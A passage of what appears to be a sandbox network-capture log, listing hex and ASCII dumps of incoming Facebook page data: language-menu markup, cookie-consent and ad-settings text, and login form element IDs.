2022-10-07 13:59:28 UTC	835	IN	Data Raw: 61 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 4b 73 62 52 73 33 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 52 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 73 72 50 6d 64 74 34 22 2c 22 30 37 4a 53 69 50 30 22 5d 2c 22 62 65 22 3a 31 7d 7d 7d 29 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 Data Ascii: a","Z2GjVu9","KsbRs3u","vGt2mxz","lWOvGTa","h3ZzAmG","BIylKC4","Fn3rAl7","RPLH8jg"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["hKY0QKT"]},"be":1},"React":{"r":["srPmdt4","07JSiP0"],"be":1}}})});</script><script>requireLazy(["InitialJSLoader"
2022-10-07 13:59:28 UTC	837	IN	Data Raw: 65 71 75 69 72 65 73 5f 65 76 65 6e 74 22 3a 66 61 6c 73 65 2c 22 77 77 77 5f 73 61 66 65 5f 6a 73 5f 6d 6f 64 65 22 3a 22 68 6f 76 65 72 22 2c 22 6d 5f 73 61 66 65 5f 6a 73 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 67 68 6c 5f 70 61 72 61 6d 5f 6c 69 6e 6b 5f 73 68 69 6d 22 3a 66 61 6c 73 65 2c 22 63 6c 69 63 6b 5f 69 64 73 22 3a 5b 5d 2c 22 69 73 5f 6c 69 6e 6b 73 68 69 6d 5f 73 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 63 75 72 72 65 6e 74 5f 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 2c 22 62 6c 6f 63 6b 6c 69 73 74 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 5b 22 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 22 2c 22 61 64 73 2d 65 6e 63 72 79 70 74 69 6f 6e 2d 75 72 6c 2d 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 2c 22 62 73 2e Data Ascii: equires_event":false,"www_safe_js_mode":"hover","m_safe_js_mode":null,"ghl_param_link_shim":false,"click_ids":[],"is_linkshim_supported":true,"current_domain":"facebook.com","blocklisted_domains":["ad.doubleclick.net","ads-encryption-url-example.com","bs.
2022-10-07 13:59:28 UTC	838	IN	Data Raw: 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 30 5f 56 76 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 42 61 68 61 73 61 20 49 6e 64 6f 6e 65 73 69 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 64 61 5f 44 4b 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 73 61 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 61 6e 73 6b 22 2c 22 74 69 74 6c 65 22 3a 22 22 Data Ascii: ":"__markup_3310c079_0_0_Vv"},"label":"Bahasa Indonesia","title":"","className":"headerItem"},{"class":"headerItem","value":"da_DK","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_1_sa"},"label":"Dansk","title":""
2022-10-07 13:59:28 UTC	840	IN	Data Raw: 3a 22 69 74 5f 49 54 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 67 77 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 75 5f 48 55 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d Data Ascii: :"it_IT","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_8_gw"},"label":"Italiano","title":"","className":"headerItem"},{"class":"headerItem","value":"hu_HU","selected":false,"ctor":{"__m":"MenuSelectableItem"},"m
2022-10-07 13:59:28 UTC	841	IN	Data Raw: 65 32 6e 5c 75 30 31 30 33 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 66 69 5f 46 49 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 4c 36 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 53 75 6f 6d 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 Data Ascii: e2n\u0103","title":"","className":"headerItem"},{"class":"headerItem","value":"fi_FI","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_g_L6"},"label":"Suomi","title":"","className":"headerItem"},{"class":"headerIte
2022-10-07 13:59:28 UTC	843	IN	Data Raw: 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 65 5f 49 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 70 66 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 61 72 5f 41 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 Data Ascii: Item","value":"he_IL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_n_pf"},"label":"\u05e2\u05d1\u05e8\u05d9\u05ea","title":"","className":"headerItem"},{"class":"headerItem","value":"ar_AR","selected":false,"ct
2022-10-07 13:59:28 UTC	844	IN	Data Raw: 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6a 61 5f 4a 50 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 5c 2f 4d 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6b 6f 5f 4b 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 Data Ascii: ":"headerItem","value":"ja_JP","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_u_\/M"},"label":"\u65e5\u672c\u8a9e","title":"","className":"headerItem"},{"class":"headerItem","value":"ko_KR","selected":false,"ctor
2022-10-07 13:59:28 UTC	845	IN	Data Raw: 36 35 32 65 0d 0a 30 30 2c 22 74 68 65 6d 65 22 3a 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 54 68 65 6d 65 22 7d 7d 5d 2c 33 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 47 31 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72 46 61 64 65 4f 6e 48 69 64 65 22 2c 22 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 2c 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 5c 2f 41 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 Data Ascii: 652e00,"theme":{"__m":"XUIMenuTheme"}}],3],["__inst_ead1e565_0_0_G1",["DialogX","LayerFadeOnHide","DialogHideOnSuccess","LayerHideOnTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_\/A","HTML"],[{"width":680,"autohide":null,"titleID":null,"redirec
2022-10-07 13:59:28 UTC	846	IN	Data Raw: 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 33 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 37 63 38 66 34 61 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 69 78 5c 22 3e 5c 75 30 30 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 Data Ascii: u003Cdiv class=\"_9xl3\">\u003Ci class=\"img sp_2myvABqqKqq sx_7c8f4a\">\u003C\/i>\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_ix\">\u003Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200
2022-10-07 13:59:28 UTC	848	IN	Data Raw: 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 Data Ascii: 3Cdiv>For advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv cla
2022-10-07 13:59:28 UTC	849	IN	Data Raw: 6f 2d 6d 5c 22 3e 49 66 20 79 6f 75 20 68 61 76 65 20 61 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 2c 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 68 6f 77 20 64 69 66 66 65 72 65 6e 74 20 64 61 74 61 20 69 73 20 75 73 65 64 20 74 6f 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 77 69 74 68 20 74 68 65 73 65 20 74 6f 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 6f 20 73 68 6f 77 20 79 6f 75 20 62 65 74 74 65 72 20 61 64 73 2c 20 77 65 20 75 73 65 20 64 61 74 61 20 74 68 61 74 20 61 64 76 65 72 74 69 73 65 72 73 20 61 6e 64 20 6f 74 68 Data Ascii: o-m\">If you have a Facebook account, you can manage how different data is used to personalize ads with these tools.\u003C\/p>\u003Cp class=\"_9si-\">Ad settings\u003C\/p>\u003Cp class=\"_9o-m\">To show you better ads, we use data that advertisers and oth
2022-10-07 13:59:28 UTC	851	IN	Data Raw: 72 20 77 65 62 73 69 74 65 73 2e 20 54 68 65 79 20 75 73 65 20 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 33 30 35 30 33 37 39 37 32 36 35 31 35 36 5c 22 3e 42 75 73 69 6e 65 73 73 20 54 6f 6f 6c 73 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 73 75 63 68 20 61 73 20 46 61 63 65 62 6f 6f 6b 20 4c 6f 67 69 6e 20 6f 72 20 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 2c 20 74 6f 20 73 68 61 72 65 20 74 68 69 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 69 74 68 20 75 73 2e 20 54 68 69 73 20 68 65 6c 70 73 20 75 73 20 64 6f 20 74 68 69 6e 67 73 20 73 75 63 68 20 61 73 20 67 69 76 65 20 79 6f 75 20 61 20 6d 6f 72 65 20 70 65 72 73 6f 6e 61 6c 69 7a 65 Data Ascii: r websites. They use our \u003Ca href=\"https:\/\/www.facebook.com\/help\/2230503797265156\">Business Tools\u003C\/a>, such as Facebook Login or Facebook Pixel, to share this information with us. This helps us do things such as give you a more personalize
2022-10-07 13:59:28 UTC	852	IN	Data Raw: 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 34 6a 59 58 2d 6e 37 75 53 41 58 4e 6c 62 68 72 31 56 77 46 53 33 71 68 35 52 31 38 42 51 61 63 4c 7a 65 56 67 72 48 44 69 68 62 33 64 65 4b 34 33 45 37 54 71 4f 46 76 65 30 77 2d 6e 76 4d 51 51 4f 33 33 49 44 77 48 68 49 52 6a 4f 4d 4d 6b 5a 5f 6f 73 65 6c 35 5f 47 46 4c 38 59 65 49 6e 37 72 75 4d 74 4f 65 35 44 53 6c 41 4c 45 47 52 71 41 7a 72 39 34 67 5f 53 76 77 68 45 50 47 41 36 4d 59 67 39 4e 6e 32 2d 5a 76 75 6b 4c 77 51 45 52 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d Data Ascii: s\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&h=AT24jYX-n7uSAXNlbhr1VwFS3qh5R18BQacLzeVgrHDihb3deK43E7TqOFve0w-nvMQQO33IDwHhIRjOMMkZ_osel5_GFL8YeIn7ruMtOe5DSlALEGRqAzr94g_SvwhEPGA6MYg9Nn2-ZvukLwQERw\" target=\"_blank\" rel=\"nofollow\" data-lynx-m
2022-10-07 13:59:28 UTC	853	IN	Data Raw: 7a 62 6b 6f 30 51 33 32 50 31 6b 54 49 73 44 6c 50 5a 62 53 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 30 36 Data Ascii: zbko0Q32P1kTIsDlPZbSA\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&h=AT06
2022-10-07 13:59:28 UTC	855	IN	Data Raw: 77 20 79 6f 75 20 74 6f 20 63 68 6f 6f 73 65 20 77 68 65 74 68 65 72 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 73 65 74 20 61 6e 64 20 74 6f 20 64 65 6c 65 74 65 20 74 68 65 6d 2e 20 54 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 76 61 72 79 20 62 79 20 62 72 6f 77 73 65 72 2c 20 61 6e 64 20 6d 61 6e 75 66 61 63 74 75 72 65 72 73 20 6d 61 79 20 63 68 61 6e 67 65 20 62 6f 74 68 20 74 68 65 20 73 65 74 74 69 6e 67 73 20 74 68 65 79 20 6d 61 6b 65 20 61 76 61 69 6c 61 62 6c 65 20 61 6e 64 20 68 6f 77 20 74 68 65 79 20 77 6f 72 6b 20 61 74 20 61 6e 79 20 74 69 6d 65 2e 20 41 73 20 6f 66 20 35 20 4f 63 74 6f 62 65 72 20 32 30 32 30 2c 20 79 6f 75 20 6d 61 79 20 66 69 6e 64 20 61 64 64 69 74 69 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e Data Ascii: w you to choose whether browser cookies are set and to delete them. These controls vary by browser, and manufacturers may change both the settings they make available and how they work at any time. As of 5 October 2020, you may find additional information
2022-10-07 13:59:28 UTC	856	IN	Data Raw: 6c 61 2e 6f 72 67 5c 75 30 30 32 35 32 46 65 6e 2d 55 53 5c 75 30 30 32 35 32 46 6b 62 5c 75 30 30 32 35 32 46 65 6e 61 62 6c 65 2d 61 6e 64 2d 64 69 73 61 62 6c 65 2d 63 6f 6f 6b 69 65 73 2d 77 65 62 73 69 74 65 2d 70 72 65 66 65 72 65 6e 63 65 73 26 61 6d 70 3b 68 3d 41 54 30 68 75 46 44 32 6e 56 34 56 66 33 41 46 64 76 70 6e 71 63 33 35 32 7a 5a 35 43 4f 53 43 50 64 4e 4e 58 6a 6a 41 4a 44 6a 30 6e 54 67 30 35 76 38 49 41 79 4c 63 30 63 49 41 77 77 55 2d 35 4b 54 77 35 33 77 59 43 76 6b 32 62 58 51 31 2d 62 30 6d 77 30 32 42 67 30 59 42 48 33 47 5f 48 76 50 44 51 57 65 6a 62 51 49 4c 53 69 64 6e 6b 6b 54 5a 61 4d 2d 41 41 2d 47 69 74 2d 66 38 46 61 78 34 53 52 4b 4e 67 43 46 7a 67 63 46 56 52 77 50 59 59 51 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c Data Ascii: la.org\u00252Fen-US\u00252Fkb\u00252Fenable-and-disable-cookies-website-preferences&h=AT0huFD2nV4Vf3AFdvpnqc352zZ5COSCPdNNXjjAJDj0nTg05v8IAyLc0cIAwwU-5KTw53wYCvk2bXQ1-b0mw02Bg0YBH3G_HvPDQWejbQILSidnkkTZaM-AA-Git-f8Fax4SRKNgCFzgcFVRwPYYQ\" target=\"_bl
2022-10-07 13:59:28 UTC	858	IN	Data Raw: 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 4f 70 65 72 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 35 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 5c 22 31 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 39 78 6f 36 20 5f 34 6a 79 33 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 Data Ascii: =\"nofollow\" data-lynx-mode=\"hover\">Opera\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo5\">\u003Cbutton value=\"1\" class=\"_42ft _4jy0 _9xo6 _4jy3 _4jy1 select
2022-10-07 13:59:28 UTC	859	IN	Data Raw: 74 6d 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 51 71 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 6c 73 6b 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 66 73 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 65 38 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 50 6f 72 74 75 67 61 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 74 4e 22 2c 7b 22 5f 5f 68 74 6d Data Ascii: tml":"Norsk (bokm\u00e5l)"},1],["__markup_3310c079_0_c_Qq",{"__html":"Polski"},1],["__markup_3310c079_0_d_fs",{"__html":"Portugu\u00eas (Brasil)"},1],["__markup_3310c079_0_e_e8",{"__html":"Portugu\u00eas (Portugal)"},1],["__markup_3310c079_0_f_tN",{"__htm
2022-10-07 13:59:28 UTC	861	IN	Data Raw: 22 75 5f 30 5f 31 5f 5a 67 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 6c 5c 2f 22 2c 22 75 5f 30 5f 32 5f 31 50 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 65 37 22 2c 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 78 42 22 2c 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 66 6d 22 2c 22 75 5f 30 5f 33 5f 75 4a 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 4f 7a 22 2c 22 75 5f 30 5f 34 5f 53 2b 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 36 50 22 2c 22 75 5f 30 5f 35 5f 31 63 Data Ascii: "u_0_1_Zg",1],["__elem_a588f507_0_3_l\/","u_0_2_1P",1],["__elem_835c633a_0_0_e7","login_form",1],["__elem_45d73b5d_0_2_xB","loginbutton",1],["__elem_f46f4946_0_0_fm","u_0_3_uJ",1],["__elem_f46f4946_0_1_Oz","u_0_4_S+",1],["__elem_a588f507_0_1_6P","u_0_5_1c
